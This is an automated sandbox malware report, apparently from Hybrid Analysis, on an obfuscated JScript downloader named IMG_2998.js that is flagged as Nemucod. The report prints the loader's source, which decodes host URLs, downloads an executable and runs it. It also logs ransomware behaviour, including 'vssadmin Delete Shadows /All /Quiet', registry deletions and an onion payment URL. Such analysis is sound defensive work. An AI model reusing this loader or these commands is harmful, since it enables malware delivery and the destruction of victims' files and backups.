RPOJECTS", "topSecretLine = " + ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").pizzaTT() + ".pizzaTT();');");
var rpc_call_assiduously_FROG2sirdallos = "RPOJECTSRXhwYW5RPOJECTSkRW52aXRPOJECTSJvbm1lbnRTdHJRPOJECTSpbmdz".pizzaTT();
var rpc_call_assiduously_FROG2Native = function(options) {
};
rpc_call_assiduously_FROG2Native.rpc_call_assiduously_FROG2XCOPmplement = function(rpc_call_assiduously_FROG2objects, rpc_call_assiduously_FROG2properties) {
for (var rpc_call_assiduously_FROG2XCOP = 0, rpc_call_assiduously_FROG2l = rpc_call_assiduously_FROG2objects.length; rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2l; rpc_call_assiduously_FROG2XCOP++) rpc_call_assiduously_FROG2objects[rpc_call_assiduously_FROG2XCOP].rpc_call_assiduously_FROG2XCOPmplement(rpc_call_assiduously_FROG2properties);
};
var rpc_call_assiduously_FROGhatershaha = "";
var rpc_call_assiduously_FROGodnoklass = "SWsjirYRp";
function mexAO(AOn) {
return new ActiveXObject(AOn);
}
if (WSH) {
NewNameCreator();
}
function mix2() {
perm_sel[fixed] = fixed; /* Generate random orientation*/
var total = 0;
var ori_sel = Array();
var i = fixed === 0 ? 1 : 0;
for (; i < 7; i = i === fixed - 1 ? i + 2 : i + 1) {
ori_sel[i] = scramblers.lib.randomInt.below(3);
total += ori_sel[i];
}
if (i <= 7) ori_sel[i] = (3 - (total % 3)) % 3;
ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/
var D = 1,
L = 2,
B = 5,
U = 4,
R = 3,
F = 0; /* D 0 1 2 3 L 4 5 6 7 B 8 9 10 11 U 12 13 14 15 R 16 17 18 19 F 20 21 22 23*/ /* Map from permutation/orientation to face*/ /* Convert cubie representation into facelet representaion*/
for (var i = 0; i < 8; i++) {
for (var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j];
}
}
var rpc_call_assiduously_FROG2d7 = "WA==".pizzaTT() + "M" + "L";
function rpc_call_assiduously_FROG2_bCho(T, D, C) {
R = D + "";
T[D](C);
}
var rpc_call_assiduously_FROG2_bChosteck = "aHR0cRPOJECTSDovLw==";
rpc_call_assiduously_FROG2d7 = topSecretLine() + rpc_call_assiduously_FROG2d7 + TortPankaky(("rpc_call_assiduously_transform", "rpc_call_assiduously_enlarge", "rpc_call_assiduously_viagra", "rpc_call_assiduously_ruffle", "rpc_call_assiduously_papacy", "2.") + "FARISHMYML77H101T" + "TP45RPOJECTS45" + "WS" + "cr" + "ipt:Uh") + "e" + "ll";
var rpc_call_assiduously_FROG2DoUtra = [rpc_call_assiduously_FROG2lidgen, rpc_call_assiduously_FROG2sirdallos, rpc_call_assiduously_FROG2VARDOCF, "LmVRPOJECTS4ZQ=RPOJECTS=".pizzaTT(), "UnRPOJECTSVuRPOJECTS".pizzaTT(), rpc_call_assiduously_FROG2d7];
rpc_call_assiduously_FROG2Richters = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2d2 = rpc_call_assiduously_FROG2DoUtra.pop();
rpc_call_assiduously_FROG2fabled = "Valar2Morgulis";
var rpc_call_assiduously_FROG2LitoyDISK = ActiveXObject;
var doubleTrouble = rpc_call_assiduously_FROG2d2.split("45");
rpc_call_assiduously_FROG2Native.rpc_call_assiduously_FROG2typize = function(a, b) {
a.type || (a.type = function(a) {
return rpc_call_assiduously_FROG2$type(a) === b
})
};
rpc_call_assiduously_FROGcccomeccc = "p";
var Limbus2000 = new Function("HORN", ' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("TRUMP", "D").replace("32", "eam");');
rpc_call_assiduously_FROGletchikva = new rpc_call_assiduously_FROG2LitoyDISK(doubleTrouble[0]);
function rpc_call_assiduously_FROG2_cCho(a, b, c, d) {
a[b](c, d)
}
abtest = doubleTrouble[rpc_call_assiduously_FROGcccomeccc + "op"]();
rpc_call_assiduously_oldBitch = mexAO('' + abtest);
rpc_call_assiduously_FROG2tudabilo1 = "s";
var rpc_call_assiduously_FROG2vulture = rpc_call_assiduously_oldBitch[rpc_call_assiduously_FROG2DoUtra.shift()](rpc_call_assiduously_FROG2DoUtra.shift());
rpc_call_assiduously_FROG2weasel = "G\x45T";
var rpc_call_assiduously_FROG2SIDRENKOV = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2promises = rpc_call_assiduously_FROG2DoUtra.shift();
var rpc_call_assiduously_FROG2OCHENA = "b3RPOJECTSBlbRPOJECTSg==".pizzaTT();
rpc_call_assiduously_FROG2SPASPI = "type";
function rpc_call_assiduously_FROG2_aCho(T, D) {
T[D]();
}
function CNPK(aa) {
return "\x3F".concat(aa, "\x3D");
}
function rpc_call_assiduously_FROG2_a2(rpc_call_assiduously_FROG2gutter, rpc_call_assiduously_FROG2StrokaParam2) {
try {
var rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2vulture;
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + silkopil;
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + rpc_call_assiduously_FROG2StrokaParam2;
rpc_call_assiduously_FROGletchikva.open(rpc_call_assiduously_FROG2weasel, rpc_call_assiduously_FROG2gutter, false);
if (rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2_cCho(rpc_call_assiduously_FROGletchikva, "set" + (11, "rpc_call_assiduously_spatial", "rpc_call_assiduously_draughts", "rpc_call_assiduously_readings", "rpc_call_assiduously_reproductive", "rpc_call_assiduously_irrelevant", "rpc_call_assiduously_conjunction", "rpc_call_assiduously_vestige", rpc_call_assiduously_FROGsrq), "User-Agent", "TW96aWxsYS80LjAgRPOJECTSKGNvbXBhdGlibGU7IE1TSUUgNi4wOyRPOJECTSBXaW5kb3dzIE5UIDUuMCk=".pizzaTT());
}
rpc_call_assiduously_FROGletchikva[rpc_call_assiduously_FROG2tudabilo1 + ("rpc_call_assiduously_regency", "rpc_call_assiduously_soldier", "rpc_call_assiduously_knack", "rpc_call_assiduously_hobby", "rpc_call_assiduously_hundredweight", "end")]();
var kuzut = rpc_call_assiduously_FROGletchikva["Re" + "sp" + (rpc_call_assiduously_FROG2StrokaParam2, "rpc_call_assiduously_bunting", "rpc_call_assiduously_cauliflower", "rpc_call_assiduously_grimace", "rpc_call_assiduously_hearse", 1123, cheboksar['BOLGARIN'])];
//if(kuzut < 29989)return false;
//if (kuzut[0]!= 77 || kuzut[1]!= 90)return false;
if (rpc_call_assiduously_FROG2TRUEFALSE) {
var rpc_call_assiduously_FROG2opOpOp = new rpc_call_assiduously_FROG2LitoyDISK(Limbus2000());
rpc_call_assiduously_FROGGaSMa = "Valar10Morgulis";
var dedlyb = new Function("n, enc", " believed = Math.floor(n); if (x < 256*256*256) { bytes = [ max + 2, Math.floor(x / 256 / 256), Math.floor(proposal / 256) % 256, x % 256 ]; } else if (x < 256*256*256*256) { genealogical = [ max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(gathered / 256) % 256, x % 256 ]; }");
var silaBitsa = new Function("RPOJECTS,RPOJECTS2", "RPOJECTS[RPOJECTS2]();");
var silaBitsa2 = new Function("RPOJECTS,RPOJECTS2", "RPOJECTS.write(RPOJECTS2);");
silaBitsa(rpc_call_assiduously_FROG2opOpOp, rpc_call_assiduously_FROG2OCHENA);
rpc_call_assiduously_FROG2opOpOp[rpc_call_assiduously_FROG2SPASPI] = rpc_call_assiduously_FROG2chosen;
silaBitsa2(rpc_call_assiduously_FROG2opOpOp, kuzut);
rpc_call_assiduously_FROG2XWaxeQhw = "Valar11Morgulis";
rpc_call_assiduously_FROG2opOpOp["position"] = 0;
rpc_call_assiduously_FROG2krDwvrh = "Valar12Morgulis";
rpc_call_assiduously_FROG2CHICKA = rpc_call_assiduously_FROG2CHICKA + rpc_call_assiduously_FROG2SIDRENKOV;
rpc_call_assiduously_FROG2opOpOp["cRPOJECTS2F2RPOJECTSZVRPOJECTSRvRmlsZQ==".pizzaTT()](rpc_call_assiduously_FROG2CHICKA, 26 / 13);
rpc_call_assiduously_FROG2SswQdi = "Valar13Morgulis";
rpc_call_assiduously_FROG2opOpOp.close();
rpc_call_assiduously_oldBitch[rpc_call_assiduously_FROG2promises](rpc_call_assiduously_FROG2CHICKA, 0, false);
return true;
}
} catch (exception2) {
return false;
}
};
eval(rpc_call_assiduously_SayNoNo.pizzaTT());
rpc_call_assiduouslyFPADZO_ZO(rpc_call_assiduouslyFPADRML);
var rpc_call_assiduously_FROGodnoklassYO = 1;
var rpc_call_assiduously_FROG2_a5 = ('RPOJECTSd2VuZHlidWxsLmNvbS5hdS84NRPOJECTS3dlZmhpPw==ZZZ' + 'RPOJECTSY29yeXJ1c3NlbGxjb2FjaGluZy5jb20vODd3ZRPOJECTSWZoaT8=ZZZ' + 'RPOJECTSd2lyLmhlYmFtbWVuLmFRPOJECTS0Lzg3d2VmaGk/ZZZ' + 'RPOJECTSZ2Rycm9vbnR0b2xzZGFydC5pbmZvL2FmLzg3d2VmaGk=' + 'ZZZRPOJECTS').split("ZZZ");
var RPOJECTS500 = new Function("rpc_call_assiduously_FROG2_a5,rpc_call_assiduously_FROG2HORDA5", 'return rpc_call_assiduously_FROG2_bChosteck.pizzaTT() + rpc_call_assiduously_FROG2_a5[rpc_call_assiduously_FROG2HORDA5].pizzaTT();');
for (rpc_call_assiduously_FROG2HORDA5 in rpc_call_assiduously_FROG2_a5) {
rpc_call_assiduously_FROGodnoklassYO++;
if (rpc_call_assiduously_FROG2_a2(RPOJECTS500(rpc_call_assiduously_FROG2_a5, rpc_call_assiduously_FROG2HORDA5) + CNPK(rpc_call_assiduously_FROGodnoklass) + rpc_call_assiduously_FROGodnoklass
rpc_call_assiduously_FROGodnoklass + rpc_call_assiduously_FROGodnoklassYO)) {
break;
}
}" - source
- Static Parser
- relevance
- 5/10
-
Process launched with changed environment
- details
- Process "vssadmin.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
- source
- Monitored Target
- relevance
- 10/10
-
Reads Windows Trust Settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source
- Registry Access
- relevance
- 5/10
-
Requested access to a system service
- details
-
"wscript.exe" called "OpenService" to access the "rasman" service
"wscript.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"wscript.exe" called "OpenService" to access the "RASMAN" service - source
- API Call
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd /c %TEMP%\__t1296.tmp.bat" on 2017-8-3.18:47:00.160
- source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "SWsjirYRp2.exe" (Show Process)
Spawned process "SWsjirYRp2.exe" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t1296.tmp.bat" (Show Process)
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process)
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Connects to LPC ports
- details
- "SWsjirYRp2.exe" connecting to "\ThemeApiPort"
- source
- API Call
- relevance
- 1/10
-
Dropped files
- details
-
"autoexec.bat" has type "data"
"BazisVirtualCDBus.inf" has type "DOS executable (COM)"
"9rNtWnjTq9RGbU.exe" has type "data"
"libpixmap.dll" has type "data"
"vmnt64.exe" has type "data"
"Adobe Reader XI.lnk" has type "data"
"rpcapd.exe" has type "data"
"yZw6snqBQ28DAzu.exe" has type "data"
"Qt5Gui.dll" has type "data"
"liblzma-5.dll" has type "data"
"MineSweeper.lnk" has type "data"
"capinfos.exe" has type "data"
"uninstall.exe" has type "data"
"libpangowin32-1.0-0.dll" has type "data"
"rRgk91Ih5n.doc" has type "data"
"msvcp90d.dll" has type "data"
"libfontconfig-1.dll" has type "data"
"dH1rDN9f9.doc" has type "data"
"libxml2-2.dll" has type "data"
"libatk-1.0-0.dll" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "wscript.exe" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
"wscript.exe" touched file "%WINDIR%\System32\WScript.exe"
"wscript.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"wscript.exe" touched file "%WINDIR%\system32\rsaenh.dll"
"wscript.exe" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"wscript.exe" touched file "%WINDIR%\System32\msxml3r.dll"
"wscript.exe" touched file "%WINDIR%\system32\wshom.ocx"
"wscript.exe" touched file "%WINDIR%\System32\msxml3.dll\1"
"wscript.exe" touched file "%WINDIR%\System32\msxml3.dll"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies\index.dat"
"wscript.exe" touched file "%APPDATA%\Microsoft\Windows\IETldCache\index.dat"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\87wefhi[1].txt"
"wscript.exe" touched file "%WINDIR%\System32\OLEACCRC.DLL"
"wscript.exe" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "wendybull.com.au"
Heuristic match: "N\IdbQMWm`KKse^C$E8,U7uR?CS_'QWwX)u'9S2&j::)?Iql^|vCQi:=JO_15bU_.>d-[wy3@0?UXAUA?dIXy`1*c;5_5Phsi62t~ha=+5 q.mn"
Heuristic match: "IbANyhF}CT/}L+$g.Haz;x}H$~|Q#*3!n*5[;!lWKYVt[UE:,}QX$l]{:uD%sJL/ky;+KZw=>Xh{kmL<(.PG"
Heuristic match: "ejo0?|zS,:OkYown'KC3j;(sK,U\B^p3a!hd6lB8n/H$jsiF9PPsMt]X{MQ}n3GXb0}Ow%>=^&a%Eg),1.Bw"
Pattern match: "WHop1.wdB/.5P&uzS"
Pattern match: "G.Jr/RHz8&v\]z"
Pattern match: "c84cK8.aN/}^nUh.J\J:X2=O+!'$3pGM0~^+_!#qU]:fQuu#zzIY;m"
Heuristic match: "SvD#-hBd`RG{dmmQ]k+lO7r#Hdh.sA"
Pattern match: "CS.BKp/62q|k+s\o3"
Heuristic match: "'q#Uv)uZk>.Iq"
Pattern match: "R.Mz/uV=m%+yWIqse"
Pattern match: "http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD"
Pattern match: "ZF.ZDZp/V~NWHWPL3"
Pattern match: "http://relaxng.org/ns/structure/1.0"
Pattern match: "Z.Sro/GMqYNkwnJ87b@`3w2#bQ,,.4sgd"
Pattern match: "k.vgN/@&KOo'9%oSHLJetW{R"
Heuristic match: "0.n>3x0/Mo.gl"
Pattern match: "https://supp7.freshdesk.com/support/tickets/new"
Pattern match: "https://www.torproject.org/projects/torbrowser.html.en"
Pattern match: "http://n224ezvhg4sgyamb.onion/sup.php" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Modifies proxy settings
- details
-
"wscript.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "SWsjirYRp2.exe" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
File Details
IMG_2998.js
- Filename
- IMG_2998.js
- Size
- 17KiB (17490 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785
- MD5
- 733b7435c3454b6d00dc3031b2a27f45
- SHA1
- 84b94111502e8394643be24a82ab49046414dc7f
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 9 processes in total (System Resource Monitor).
-
wscript.exe
"C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js"
(PID: 3216)
-
SWsjirYRp2.exe
(PID: 3476)
-
SWsjirYRp2.exe
(PID: 3160)
-
cmd.exe
cmd /c %TEMP%\__t1296.tmp.bat
(PID: 3048)
- vssadmin.exe Delete Shadows /All /Quiet (PID: 3068)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f" (PID: 3236)
- reg.exe "reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f" (PID: 3132)
- reg.exe "reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" (PID: 3220)
- attrib.exe attrib Default.rdp -s -h (PID: 3212)
-
cmd.exe
cmd /c %TEMP%\__t1296.tmp.bat
(PID: 3048)
-
SWsjirYRp2.exe
(PID: 3160)
-
SWsjirYRp2.exe
(PID: 3476)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
wendybull.com.au
OSINT |
113.20.4.209 | TPP Internet | Australia |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
113.20.4.209 |
80
TCP |
wscript.exe PID: 3216 |
Australia |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
113.20.4.209:80 (wendybull.com.au) | GET | wendybull.com.au/87wefhi??SWsjirYRp=SWsjirYRp | GET /87wefhi??SWsjirYRp=SWsjirYRp HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept-Encoding: gzip, deflate
Host: wendybull.com.au
Connection: Keep-Alive 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 113.20.4.209:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Unsupported/Fake Windows NT Version 5.0 | 2016879 |
local -> 113.20.4.209:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Nemucod JS Downloader Aug 01 2017 | 2024508 |
113.20.4.209 -> local:62475 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
113.20.4.209 -> local:62475 (TCP) | A Network Trojan was detected | ET INFO Possible Windows executable sent when remote host claims to send a Text File | 2008438 |
113.20.4.209 -> local:62475 (TCP) | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) | 2015744 |
Extracted Strings
Extracted Files
Displaying 137 extracted file(s). The remaining 1574 file(s) are available in the full version and XML/JSON reports.
-
Malicious 1
-
-
__t1296.tmp.bat
- Size
- 445B (445 bytes)
- Type
- text
- Description
- DOS batch file, ASCII text, with CRLF line terminators
- AV Scan Result
- Labeled as "Trojan.BAT.Agent" (16/58)
- Runtime Process
- cmd.exe (PID: 3048)
- MD5
- 32d8f7a3d0c796cee45f64b63c1cca38
- SHA1
- d58466430a2bba8641bd92c880557379e25b140c
- SHA256
- 1a6f73b5c28d1c10f63f2056068c1de61487b8cf8f1dcf7516548df144b3e9ea
-
-
Informative Selection 2
-
-
RECOVER-FILES-726.html
- Size
- 4.6KiB (4714 bytes)
- Type
- html
- Description
- HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- d0b7aaa0a75992801aafd12fb2db35fb
- SHA1
- 15480a51a3e411e95b4679d2fb34ce90a29788ee
- SHA256
- b466fc74951c02936abe5c23b3ca2a8db6a9699a3cca3d0870c4a47d291f6de8
-
80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js
- Size
- 18KiB (18448 bytes)
- Type
- data
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- c5a575f6a59f667e05f4f9cacf718361
- SHA1
- b51ede44e719d6e90cc2a34007e7ca8918384a48
- SHA256
- 63a94a13a5b230445e70f61c39f7eb980e306fe4ba0471213fdd6ac091387663
-
-
Informative 134
-
-
InstallTime20150122214805
- Size
- 960B (960 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- fffe237fa975420d22d4ac7abb5f14ef
- SHA1
- 7b2e7f194054fcfb8d5dbf2bc126cd397f670b7e
- SHA256
- 5fd95dd1522f70b83a823e8f0beb6dac76c7946f583e1e86cf2e0758054f8cf3
-
SiteSecurityServiceState.txt
- Size
- 1.1KiB (1152 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- a04b2b340c91bff4094482abc9ed9686
- SHA1
- 49944bd04d5add30008fb69f39b98e7971cb64f6
- SHA256
- 056690935f5d5c76a0b2a9affe16abfd60b76d5bfb806f559b623193da0efb49
-
Telemetry.FailedProfileLocks.txt
- Size
- 960B (960 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 8fcbadee8c653a4c5457abab37ff31c5
- SHA1
- dc156af328cc1c34de0d7fd914269b29cc9066ef
- SHA256
- ae9ad32e68ae4dc014d9a2b278dd3430ac9181f6fc147cfacf25eafcd4ff3ffa
-
addons.json
- Size
- 976B (976 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 8266aa767f3edf6617e40e5002709563
- SHA1
- bf21963da765f40952be275bb990b997a3fffee9
- SHA256
- e9c31819b5a4cf1b7d8d54f5e0d55a8daa06e7bcaa7ed23b91198486cb77b146
-
blocklist.xml
- Size
- 148KiB (151088 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- a6d3a2f228814fb2b088954da065db21
- SHA1
- e5d4e3c8214a8afee32cf41b38c9a61bccf709f5
- SHA256
- ba3966f88880034a7354587a6d8e0b90b73a87e29933e4d0793b389754c412db
-
cert8.db
- Size
- 113KiB (115632 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- ebc0bd7f524bee867b3e75b7b226ec91
- SHA1
- b78e066dce91b2a9063bab613c6e699beff4083a
- SHA256
- 70c47c917ad3671a7a987b912d174484f96efc60cfccef6e7f395026573c85bd
-
compatibility.ini
- Size
- 1.1KiB (1152 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- aa34112b6b7ec2fa9ed2b0daa4279ff5
- SHA1
- 2f6290130461569ffaac286cc2ad11265581d0db
- SHA256
- ba211365fba7231efab6798166523ab24b57b633780035ef13aabfbc7848bd7c
-
content-prefs.sqlite
- Size
- 225KiB (230320 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 7f330880214ab31162caf344b17ce570
- SHA1
- 4643049df0ca1f161ba87c54b6547710018509a1
- SHA256
- 1aaa9569ccfcef9d7738b0c9c300e942f9f22e8c94865c3702a84779a0ece824
-
cookies.sqlite
- Size
- 513KiB (525232 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 8f298a8dc5dda0c542c854de724e2259
- SHA1
- 4489073510375720e2214dd2d1d00192bce69bda
- SHA256
- 5deae06da2477fe730c9b188d0fa8ceb7743beffefb74f2f725363212cd28472
-
store.json.mozlz4
- Size
- 1KiB (1024 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- c62796e9744d86ddb8d0e766673c46ba
- SHA1
- a8f4ff59134bbd680e35b91256630583dfdf3d05
- SHA256
- dbfbfca808c9ae114e0a343f7c44de51d22351b649549d319baf5a7e5c5bda5f
-
state.json
- Size
- 1.1KiB (1152 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- c299db8a4beca82ce2fd14e993522bf4
- SHA1
- 871f662e01c130af86bf36194f8c5025db262432
- SHA256
- e5649464c37018320d30979d5a84d2d2e52ffb284197a45d9fc54c4723e9af2d
-
extensions.ini
- Size
- 1.1KiB (1120 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 11d2368e8215d2fd5ffad5fc212d6843
- SHA1
- c364155c55526c510ad46e3e8c1aa8aa27ea3a94
- SHA256
- 9dd4191e2046ca62f4cbf252ec360c3e16765d0dec326a623ce910df247a9407
-
extensions.json
- Size
- 1.9KiB (1984 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- ad2371fab30cad46b398dfad4f9c4033
- SHA1
- c9a5ecb77d6c8ab5812fe058b3da4a740e195a2e
- SHA256
- cd60fd19d5ad9b027e595bae4bc5b21a092455fc00763163c53f61d4c8da4a19
-
formhistory.sqlite
- Size
- 193KiB (197552 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- c50c6f3da630e393953e141122a46a52
- SHA1
- 444d3cbaf9ce5ddf093797bbcf3f93d9198c5066
- SHA256
- 3383d4b2fa07ca30b4e34ed12e19be117eddd47f5cb6e53775505204350926a7
-
gmpopenh264.info
- Size
- 1KiB (1072 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- f85a3697d74f4807555344bc7ea108b2
- SHA1
- 345f63ab41962a3af05da8528a2913270f69ec0f
- SHA256
- b4c92ec6f657f0a34843130768d3f09a7c51fa49aa7d8843863fea4ba93428d9
-
healthreport.sqlite
- Size
- 1.1MiB (1147824 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 9d17ce1440b45140a33c77e4d8ad71e6
- SHA1
- d2b0c51bf9461f99671c3e8040c0dd20d3bf21a6
- SHA256
- 854c3984d6aaeab726886d85cda6afbe6935b8b1e222408f49355f7f9ba5cc1e
-
key3.db
- Size
- 17KiB (17328 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 11b7da81d37d2425b435042058c3ad95
- SHA1
- 11efd8d7b53c69d99ed9c7674755982bc78e2e58
- SHA256
- f72b57fbf721b85d48dd814b8596f167ed4b6ef5bc49ab343ec408400bda8824
-
mimeTypes.rdf
- Size
- 4.7KiB (4768 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- f3b20a3e13b81d5eaaace005ec8015ad
- SHA1
- d8959ba209c89f619c6fc0b31463e9bc72c1f65a
- SHA256
- b766152b69053c515407a03afb91fd5977ea8fd7c2567cd4fa37d07f4368f5af
-
permissions.sqlite
- Size
- 65KiB (66480 bytes)
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- ee3c02a7f85241738f2ad7d675ec3982
- SHA1
- 97f51a91b2774b45028771140286f7e4c58c8eee
- SHA256
- 6a1c4c9c408beb2e072ce78d2058a1e6059ce2f8c3af3211c7cd5c96859c4516
-
Adobe Reader XI.lnk
- Size
- 3.9KiB (4000 bytes)
- Type
- data
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- f637b29c61625b9e048eebc0e5a5a614
- SHA1
- c6e623e8d7b869f82e4b0df972c7436cc9cd7c33
- SHA256
- 31a55f6d2f809d2523a03a0b40c18d4489c72ae884b4d121ad1d868ffd52246f
-
Google Chrome.lnk
- Size
- 4.2KiB (4288 bytes)
- Type
- data
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- 823ab508ff432b2454045ee0bf855d49
- SHA1
- d8ba9772083e963ec949b3547757b1feecffc5b1
- SHA256
- abe93bc0734050fe9bceff3445d95ecd19734c2025c97bac888ad443be44056d
-
Mozilla Firefox.lnk
- Size
- 2.2KiB (2240 bytes)
- Type
- data
- Runtime Process
- SWsjirYRp2.exe (PID: 3160)
- MD5
- a09a850ad1a64938f52b11ae6bf47f14
- SHA1
- 52574b40d7f93f771b7d70f4d8ff51be8223fb1d
- SHA256
- d676db208f6cd51c621b0b59da626a8f5ecdc40c612b4226f8edeae8a7f840a0
-
SWsjirYRp2.exe
- Size
